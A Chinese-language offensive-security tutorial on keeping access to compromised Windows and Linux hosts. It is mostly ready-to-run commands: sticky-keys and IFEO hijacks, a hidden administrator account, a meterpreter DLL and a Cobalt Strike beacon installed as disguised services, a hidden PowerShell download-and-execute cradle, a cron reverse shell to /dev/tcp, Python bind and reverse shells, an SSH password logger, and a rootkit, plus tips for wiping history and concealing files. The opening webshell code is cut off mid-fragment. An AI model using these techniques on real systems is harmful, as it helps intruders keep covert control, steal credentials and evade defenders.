权限维持篇

一、Windows

1、 不死马权限维持

1.1  概述

\n";
fwrite($file, $txt);
fclose($file);
}
sleep($interval);
} while (true);
?>

1.2  环境准备

1、Windows Server 2012

2、phpstudy

1.3  复现

1、上传到目标网站目录中，保存为 1.php，如果可以，可以把属性设置为隐藏，也可以设置为不可删除；

2、访问 1.php 文件，此时会自动生成 test.php 文件，除非重启 apache 服务器，否则 test.php 文件就算删除也会一直生成；

2、映像劫持技术

2.1  概述

通过在注册表

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options

路径下添加自定义的字符串值，然后添加路径。进行 exe 劫持

2.2  复现

1、访问 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options 路径，新建项，命名为 chun.exe，然后新建字符串值 ，改名为 Debugger。

2、双击，填入后门的地址，此处以 cmd.exe 为例：

C:\Windows\System32\cmd.exe

3、此时若用户访问任何以 chun.exe 命名的 exe 文件，那么将直接执行 cmd.exe，达到映像劫持的目的。

3、策略组脚本维持

3.1  概述

        在策略组脚本目录中上传脚本文件，内容是后门或其它，然后设置电脑每次重启都会运行该 exe 文件。

3.2  复现

1、进入以下目录：

C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup

2、创建 1.bat 文件：

@echo off
systeminfo >1.txt

3、设置开机自动运行：

（1）win + r 输入 gpedit.msc 打开本地策略组；

（2）顺序点击以下选项：

填入脚本路径

然后点击确定，重启计算机，脚本执行成功。

4、shift 后门

4.1  概述

        shift 连按五次后会弹出粘滞键界面，我们可以对这个快捷方式进行替换，替换成我们想执行的后门文件。

4.2  复现

1、在目录 C:\windows\system32\ 下找到 sethc.exe 文件，选中右键，点击属性；

2、点击安全，点击高级：

3、点击更改，点击立即查找，更改用户为管理员用户：

4、把权限设为全部允许：

5、执行以下命令（以 cmd.exe 为例）

move C:\windows\system32\sethc.exe C:\windows\system32\sethc.exe.bak
Copy C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe

6、 此时连按5次 shift 键就会执行 cmd.exe 了，达到劫持的效果

5、建立影子账号

5.1  概述

        建立账户后，通过一系列操作来使得账户隐藏

5.2  复现

1、先建立一个账户：

net user admin$ 123456 /add
net localgroup administrators admin$ /add

2、此时用 net user 命令，是看不到用户 admin$ 的

$ 使得 cmd 查询不到

3、但是可以通过以下途径看到：

（1）在控制面版中可以看到：

（2）在计算机管理下也是可以看到的：

接下来对他们进行隐藏。

4、操作注册表：

（1）win + r 输入 regedit 打开注册表

（2）进入 表 HEKY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 目录

注意：此时若 SAM 目录看不到里面的内容，说明是没有访问权限，需要设置访问权限；

设置为如下图的样子：

 重新打开注册表，此时就可以正常查看 SAM 目录下的内容了

（3）观察下列数值是对应的：

（4）复制管理员用户 1F4 文件夹下 F 的内容

双击点开，右键，全选，复制：

（5）粘贴到 3ea 的 F 中：

（6）导出 3ea 和 admin$ 的配置文件，右键，导出：

命名为1

命名为2

（7）在计算机管理中，把 admin$ 删除

（8）双击运行刚才保存的文件 1 和文件 2

此时计算机管理界面中就没有 admin$ 的信息了

控制面板中也没有 admin$ 用户信息了

但是注册表中依然会有用户信息

6、powershell 配置后门

6.1  概述

        目的是每次启动 powershell 的时候会自动运行后门文件。

6.2  复现

1、检查 powershell 的配置文件信息：

echo $profile   // 输出配置文件的路径
Test-path $profile  // 用于指示当前用户是否有自定义的 PowerShell 配置文件。如果配置文件存在，则返回 True；如果不存在，则返回 False

2、如果返回 false 则创建一个：

New-Item -Path $profile -Type File –Force

3、添加后门路径：

$string = 'Start-Process "C:\1.bat"'
$string | Out-File -FilePath $profile -Append
more $profile

后门内容（这里以添加用户为例）：

net user chun 123456 /add & net localgroup administrators chun /add

4、重启 powershell ，发现用户成功创建

7、Monitor 权限维持

7.1  概述

7.2  复现

1、下载项目：GitHub - Al1ex/Monitor: A old way to Persistence

2、把项目中 Release 文件夹下的 monitor.exe 复制到 C:/Windows/System32 目录下

3、使用 msf 生成 dll 后门：

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.103.130 LPORT=7788 -f dll > test.dll
也可以使用 -o 指定保存路径
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.103.130 LPORT=7788 -f dll -o /tmp/test.dll

4、把 shell.dll 复制到 C:/Windows/System32 目录下

5、msf 开启监听：

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.103.130
set lport 7788
exploit

6、运行 monitor.exe ，此时 msf 获取到 meterpreter

7、但是每次都要运行 monitor.exe 会很麻烦，所以要设置开机自启动，打开注册表，然后找到目录 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors ，执行 cmd 命令：

reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /d "test.dll" /t REG_SZ

此时重启计算机，msf 就会自动上线了

8、利用安全描述符隐藏服务后门进行权限维持

8.1  概述

8.2  复现

1、使用 CS 上线：

（1）在 kali 中启动服务（运行 server 目录下的 teamserver）：

（2）在物理机中 Client 文件夹下点击运行 cobaltstrike-client.vbs，输入账号和密码进行登录

（3）设置监听器，生成 windows 可执行文件，保存为 beacon.exe ，上传到目标主机的 C:\Users\Administrator 目录下

（4）运行可执行文件，发现上线成功

2、设置 beacon.exe 为自启动

使用 cmd 
sc create ".NET CLR Networking 3.5.0.0" binpath= "cmd.exe /k C:\Users\Administrator\beacon.exe" depend= Tcpip obj= Localsystem start= auto
或
使用 powershell
New-Service -Name ".NET CLR Networking 3.5.0.0" -DisplayName ".NET CLR Networking 3.5.0.0" -BinaryPathName "cmd.exe /k C:\Users\Administrator\beacon.exe" -StartupType AutomaticDelayedStart

注意：服务名（.NET CLR Networking 3.5.0.0）可以自己自定义，但是必须要具有一定迷惑性

命令执行后，服务创建成功：

以上设置完成后，其实每次开机服务都会自动开启了。

也可以在任务管理器中右键手动开启服务，但是可以使用命令很轻松的查询到

（1）cmd 使用 sc query
sc query | finstr ".NET CLR Networking 3.5.0.0"

（2）powershell 使用 Get-Service  
Get-Service | finstr ".NET CLR Networking 3.5.0.0"

 3、在任务管理器中隐藏服务：

sc sdset ".NET CLR Networking 3.5.0.0" "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

这是启动服务可以用如下命令：

net start ".NET CLR Networking 3.5.0.0"

4、但是如果管理员查看注册表，还是可能发现问题的

这时候就要对这些信息进行隐藏

（1）在 kali 中编辑 1.ps1 然后保存：

function Server-Sddl-Change{
[CmdletBinding()]
param
(
[parameter(Mandatory=$false)][String]$Name
)
$ROOT = "HKLM:\SYSTEM\CurrentControlSet\Services\"
$S = $ROOT+$NAME
$acl = Get-Acl $S
$acl.SetAccessRuleProtection($true, $false)
$person = [System.Security.Principal.NTAccount]"Everyone"
$access = [System.Security.AccessControl.RegistryRights]"QueryValues"
$inheritance = [System.Security.AccessControl.InheritanceFlags]"None"
$propagation = [System.Security.AccessControl.PropagationFlags]"None"
$type = [System.Security.AccessControl.AccessControlType]"Deny"
$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `
$person,$access,$inheritance,$propagation,$type)
$acl.AddAccessRule($rule)
$person = [System.Security.Principal.NTAccount]"Everyone"
$access =
[System.Security.AccessControl.RegistryRights]"SetValue,CreateSubKey,EnumerateSu
bKeys,Notify,CreateLink,Delete,ReadPermissions,WriteKey,ExecuteKey,ReadKey,Chang
ePermissions,TakeOwnership"
$inheritance = [System.Security.AccessControl.InheritanceFlags]"None"
$propagation = [System.Security.AccessControl.PropagationFlags]"None"
$type = [System.Security.AccessControl.AccessControlType]"Allow"
$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `
$person,$access,$inheritance,$propagation,$type)
$acl.AddAccessRule($rule)
Set-Acl $S $acl
}

（2）开启 http 服务器：

sudo python -m http.server 5566

（3）远程执行 powershell 命令来下载执行 1.ps1：

powershell.exe -exec bypass -nop -w hidden -c "IEX((New-Object Net.WebClient).DownloadString('http://192.168.103.130:5566/1.ps1')); Server-Sddl-Change -Name '.NET CLR Networking 3.5.0.0'"

此时敏感信息就没有了

 9、IIS 后门

9.1  概述 

        在 IIS 网站目录里上传 DLL 文件，修改配置文件，达到权限维持的目的。

9.2  复现

1、工具地址：GitHub - WBGlIl/IIS_backdoor: backdoor

2、在 IIS 服务器中，一般在 C:\inetpub\wwwroot\bin 目录下会存放 dll 文件，所以我们先上传工具 /bin 目录下的 IIS_backdoor_dll.dll 到这个目录，可以对文件进行隐藏

3、上传 web.config 到 C:\inetpub\wwwroot 目录下，若 web.config 已存在，需要把下述内容按照情况加到 web.config 中

 4、这时候直接访问服务器内的任意一个网站或任意一个文件（如 png，txt 等），打开工具 /bin 目录下的 IIS_backdoor_shell.exe ，输入刚才访问成功的网址，然后输入 cmd 命令即可成功执行。

 10、Windows 隐藏技术

10.1  概述

        用 Windows 隐藏技术把后门文件隐藏起来。

10.2  复现

1、最简单的隐藏，选中文件，右键 -> 属性 -> 勾选隐藏：

但是只要勾选了查看隐藏文件就可以看到了

2、使用命令进行深度隐藏：

Attrib +s +a +h +r webshell.aspx

这时候就算勾选了显示隐藏的项目也看不到了，还有一种方法是点击选项，把隐藏受保护的文件的勾去掉，这时候就可以看到被隐藏的文件了

11、驱动级文件隐藏

11.1  概述

11.2  复现

1、下载工具：Thank you for downloading Easy File Locker (64-bit) from CNET Download.com

2、点击 Add file 添加文件：

3、只保留一个勾：

这时候只能访问，不能修改，不能删除，也不可见

4、这时候如果我们是被害者，找不到文件，也找不到 easy file locker ，可以使用如下命令解决：

sc query xlkfs
net stop xlkfs
sc delete xlkfs

二、Linux

1、修改文件/终端属性

1.1  修改文件创建时间

1、概述：如果蓝队根据文件修改时间来判断文件是否为后门，如参考 index.php 的时间再来看shell.php 的时间，就可以判断 shell.php 的生成时间有问题（如创建时间相差巨大或最新创建）。

2、操作：

touch -r index.php shell.php

touch -r 用 index.php 的文件的属性来创建 shell.php ，这样两个文件属性就是一样的。

1.2  修改文件锁定

1、概述：在 Linux 中，使用 chattr 命令来防止 root 和其他管理用户误删除和修改重要文件及目录，此权限用 ls -l 是查看不出来的，从而达到隐藏权限的目的。

2、操作：

sudo chattr +i test.php #锁定文件
rm -rf test.php #提示禁止删除
lsattr test.php #属性查看
sudo chattr -i test.php #解除锁定
rm -rf test.php #彻底删除文件

1.3  修改历史操作命令

1、概述：        

        在 shell 中执行的命令，记录在命令行历史中，可以用 history 命令查看，下面讲述如何开启无痕操作模式。

2、操作：

（1）技巧一，禁用历史记录：

[space]set +o history

        上面的命令会临时禁用历史功能，这意味着在这命令之后你执行的所有操作都不会记录到历史中，然而，这个命令之前的所有东西都会原样记录在历史列表中。

恢复历史记录的命令：

[space]set -o history

（2）技巧二，从历史记录中删除指定命令：

history | grep '要删除的命令的关键词'
history -d 删除的命令的项数

（3）技巧三，批量删除历史记录：

sed -i '150,$d' ~/.bash_history

这是一个用于在 Bash 中编辑历史记录文件（~/.bash_history）的 sed 命令。
sed: 是流编辑器，用于处理和转换文本。
-i: 表示直接在文件中进行编辑（in-place）而不是输出到终端。
'150,$d': 是 sed 命令中的表达式，表示从第 150 行到文件末尾（$ 表示最后一行）删除（d 表示删除）。
因此，这个命令的意思是：从 ~/.bash_history 文件的第 150 行开始，一直删除到文件末尾的所有行。在 Bash 中，~/.bash_history 文件通常用于存储用户的命令历史记录。

1.4  password 写入

1、概述：

（1）使用命令 cat /etc/passwd 时，各部分的含义：

补充：如果不知道哪些是用户，可以使用命令：cat /etc/passwd | grep bash

用户名:密码:用户ID:组ID:身份描述:用户的家目录:用户登录后所使用的SHELL
root:x:0:0:root:/root:/bin/bash
web2:x:1000:1000:web2,,,:/home/web2:/bin/bash

（2）使用 cat /etc/shadow 命令

用户名:密码的MD5加密值:自系统使用以来口令被修改的天数:口令的最小修改间隔:口令更改的周期:口令失效的天数:口令失效以后帐号会被锁定多少天:用户帐号到期时间:保留字段尚未使用root:$6$6.imW5Ld$qNRtolNQ3MShopajilTqD89NmsGpVDKE08.Hno.ac6/nfbXia3HBjZT6r7/WtC3CoUUCRfDwOF2cFpKLORYk81:18920:0:99999:7:::
web2:$6$mXlE4pZ9$b0njm2mozkJu2851SUHDgKNhN3LIQhYa/cL8yUEO26n1tmiJTLwZN1sEyoiD074IPhrHkCVzAwQvIulBM0.0z0:18920:0:99999:7:::

2、操作：

（1）生成加密后的密码：

perl -le 'print crypt("passwd","salt")'

这个 Perl 命令用于生成一个加密过的密码哈希。具体而言：

• perl: 启动 Perl 解释器。
• -le: 是命令行选项，表示在每行末尾添加换行符（line ending）。
• 'print crypt("passwd","salt")': Perl 表达式，使用 crypt 函数生成密码的哈希值。其中，"passwd" 是要加密的密码，"salt" 是用于加密的盐值。

（2）创建管理员用户：

echo "m123:sadtCr0CILzv2:0:0:/root:/bin/bash" >> /etc/passwd

创建成功

这时候也可以用 ssh 进行远程连接：

ssh [email protected]

2、suid 后门

2.1  概述

        在 root 权限下创建 suid 权限的可执行程序，普通用户执行可执行程序后权限就会提升为 root；

2.2  操作

1、创建 suid 权限的文件：

cp /bin/bash /tmp/test
chmod 4755 /tmp/test
ls -al /tmp/test

2、执行可执行程序：

./test -p

3、查找具有 suid 权限的文件，不一定非得是 bash：

find / -perm -u=s -type f 2>/dev/null

3、SSH 后门

3.1  SSH 软链接后门

3.1.1  概述

        软链接后门的原理是利用了 PAM 配置文件的作用，将 sshd 文件软连接名称设置为 su，这样应用在启动过程中他会去 PAM 配置文件夹中寻找是否存在对应名称的配置信息（su），然而 su 在 pam_rootok 只检测 uid=0 即可认证成功，这样就导致了可以使用任意密码登录:

3.1.2  操作

（1）创建软链接：

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345

（2）远程 ssh 登录：

ssh [email protected] -p 12345

密码随便输入就能连接成功了

3.2  SSH 公钥免密码登录

3.2.2  概述

        保存服务器的公钥直接

3.2.2  操作

1、在服务器中生成公钥和私钥，注意要在管理员权限下生成：

ssh-keygen -t rsa

2、在服务器中保存生成的公钥：

cd ~/.ssh
cat id_rsa.pub > authorized_keys

 

3、 在服务器中复制得到私钥 id_rsa 的内容：

cat id_rsa

4、在客户端中保存为 id_rsa 并设置权限:

vim id_rsa
chmod 600 id_rsa

5、远程进行 SSH 连接：

ssh -i id_rsa [email protected]

3.3  SSH keylogger 记录密码

3.3.1  概述

        当前系统如果存在 strace 的话，它可以跟踪任何进程的系统调用和数据，可以利用 strace 系统调试工具获取 ssh 的读写连接的数据，以达到抓取管理员登陆其他机器的明文密码的目的，只能监听本地的连接操作。

3.3.2  操作

1、修改 .bashrc 文件：

（1）打开编辑 .bashrc
vim ~/.bashrc
（2）添加以下内容
alias ssh='strace -o "/tmp/pwdlog_$(date +"%Y%m%d_%H%M%S")" -e read,write,connect -s 2048 ssh'
（3）重新加载.bashrc
source ~/.bashrc

2、登录 ssh：

ssh [email protected]

3、查看生成的 log 文件：

cat log | grep password

4、Ubuntu 利用 Cron 机制安装后门

4.1  概述

1、Cron 是 ubuntu 下默认启动的用户执行计划，它会按照设置，在固定的周期或者按照一定时间执行某一个任务。

2、它是一项服务，你可以使用基本的服务查看状态命令等查看信息：

service cron status

3、 查看普通用户的计划：

crontab -l

 4、编辑计划：

crontab -e 

4.2  操作

1、设置 Cron 设置反向 shell ，每小时执行一次：

(crontab -l;printf "* * * * * /bin/bash -c '/bin/sh -i >& /dev/tcp/192.168.103.130/7788 0>&1';\r%100c\n")|crontab -

2、攻击主机进行监听：

nc -lvnp 7788

5、 vim python 拓展后门

5.1  概述

        适用于安装了 python 和 vim 的 linux 系统

5.2  操作

1、编辑后门文件：

（1）正向后门（ 下面的操作用正向连接来举例）：

from socket import *
import subprocess
import os

server = socket(AF_INET, SOCK_STREAM)
server.bind(('0.0.0.0', 5566))
server.listen(5)
print('waiting for connect')
talk, addr = server.accept()
print('connect from', addr)
proc = subprocess.Popen(["/bin/sh", "-i"], stdin=talk, stdout=talk, stderr=talk, shell=True)

（2）反向后门：

import socket
import subprocess
import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.103.130", 5566))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])

（3）隐藏连接时的输出：

(nohup vim -E -c "py3file 1.py"> /dev/null 2>&1 &) && sleep 2 && rm -f 1.py

（4）使用命令查看 TCP 连接进程：

netstat -anpt

（5）这时候可以进行正向连接了：

nc 192.168.103.174 5566

（6）但是由于进程中可以看到 vim 的进程，所以需要进行隐藏，为了方便演示，这里就先不删除文件了，所以隐藏输出的语句变成了：

nohup vim -E -c "py3file 1.py"> /dev/null 2>&1 &

执行指令

（7）隐藏进程的操作：

         mount --bind 命令是将前一个目录挂载到后一个目录上，所有对后一个目录的访问其实都是对前一个 目录的访问，并且会将前一个目录路径隐藏起来

netstat -anpt

mkdir null
mount --bind null /proc/3128
netstat -anpt

隐藏成功 ，这时候也可以进行连接：

ssh 192.168.103.174 5566

补充（取消挂载）：

（1）查看挂载记录：

cat /proc/$$/mountinfo

（2）删除挂载：

sudo umount /proc/3128

6、inetd 服务后门

6.1  概述

        inetd 是一个监听外部网络请求(就是一个 socket )的系统守护进程，默认情况下为13端口。当inetd 接收到 一个外部请求后，它会根据这个请求到自己的配置文件中去找到实际处理它的程序，然后再把接收到的 这个 socket 交给那个程序去处理。所以，如果我们已经在目标系统的 inetd 配置文件中配置好，那么来自 外部的某个 socket 是要执行一个可交互的 shell，就获取了一个后门。

6.2  操作

1、查看目标主机是否有 inetd，若没有，就安装一个：

apt install openbsd-inetd

2、编辑服务配置文件：

（1）添加默认端口：

vim /etc/services

（2）添加服务内容：

woot 5566/tcp

 

3、编辑工具配置文件：

（1）打开文件：

vim /etc/inetd.conf

 （2）添加内容：

woot stream tcp nowait root /bin/bash bash -i

 4、启动 inetd：

inetd

5、远程主机进行正向连接：

nc 192.168.103.171 5566

7、协议后门

7.1  概述

        在一些访问控制做的比较严格的环境中，由内到外的 TCP 流量会被阻断掉。但是对于UDP、DNS、ICMP 等相关流量通常不会拦截。

8、PAM 后门

8.1  概述

        上面提到的 sshd 软链接后门利用的 PAM 机制达到任意密码登录，还有一种方式是键盘记录。原理主要是通过 pam_unix_auth.c 打补丁的方式潜入到正常的 pam 模块中，以此来记录管理员的帐号密码。

9、Rootkit

9.1  概述

        使用 Diamorphine 进行权限提升

9.2  操作

1、下载工具：GitHub - m0nad/Diamorphine: LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 and ARM64)

2、工具初始化：

（1）进入工具目录
（2）使用 make 指令，若未下载 make，使用 apt install make
（3）使用 insmod diamorphine.ko 命令

3、在普通用户下进行提权：

kill -64 pid号 指定某用户变成 root
kill -64 0

现在就是 root 权限了

4、隐藏进程：

隐藏进程 kill -31 pid号

5、隐藏模块：

隐藏模块 kill -63 pid号 
idmod 命令可以看到所有的模块名称

 6、卸载模块：

rmmod diamorphine